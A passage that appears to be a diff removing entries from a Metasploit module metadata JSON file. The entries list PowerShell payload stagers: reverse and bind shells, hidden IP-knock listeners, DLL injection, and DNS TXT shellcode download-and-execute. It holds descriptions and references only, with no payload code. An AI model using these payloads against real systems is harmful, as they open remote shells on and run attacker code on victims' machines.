"needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_winhttp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_cmd/windows/powershell/custom/reverse_winhttps": { - "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_winhttps", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_winhttps" - }, - "payload_cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/dllinject/bind_hidden_tcp": { - "name": "Powershell Exec, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/dllinject/bind_ipv6_tcp": { - "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/dllinject/bind_named_pipe": { - "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/dllinject/bind_nonx_tcp": { - "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/dllinject/bind_tcp": { - "name": "Powershell Exec, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/dllinject/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/dllinject/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/dllinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/dllinject/find_tag": { - "name": "Powershell Exec, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/dllinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/find_tag", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/dllinject/reverse_http": { - "name": "Powershell Exec, Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_http", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_http" - }, - "payload_cmd/windows/powershell/dllinject/reverse_http_proxy_pstore": { - "name": "Powershell Exec, Reverse HTTP Stager Proxy", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_http_proxy_pstore", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_cmd/windows/powershell/dllinject/reverse_ipv6_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/dllinject/reverse_nonx_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/dllinject/reverse_ord_tcp": { - "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/dllinject/reverse_tcp": { - "name": "Powershell Exec, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/dllinject/reverse_tcp_allports": { - "name": "Powershell Exec, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/dllinject/reverse_tcp_dns": { - "name": "Powershell Exec, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/dllinject/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/dllinject/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/dllinject/reverse_winhttp": { - "name": "Powershell Exec, Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_cmd/windows/powershell/dns_txt_query_exec": { - "name": "Powershell Exec, DNS TXT Record Payload Download and Execution", - "fullname": "payload/cmd/windows/powershell/dns_txt_query_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "corelanc0d3r " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nPerforms a TXT query against a series of DNS record(s) and executes the returned x86 shellcode. The DNSZONE\noption is used as the base name to iterate over. The payload will first request the TXT contents of the a\nhostname, followed by b, then c, etc. until there are no more records. For each record that is returned, exactly\n255 bytes from it are copied into a buffer that is eventually executed. This buffer should be encoded using\nx86/alpha_mixed with the BufferRegister option set to EDI.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 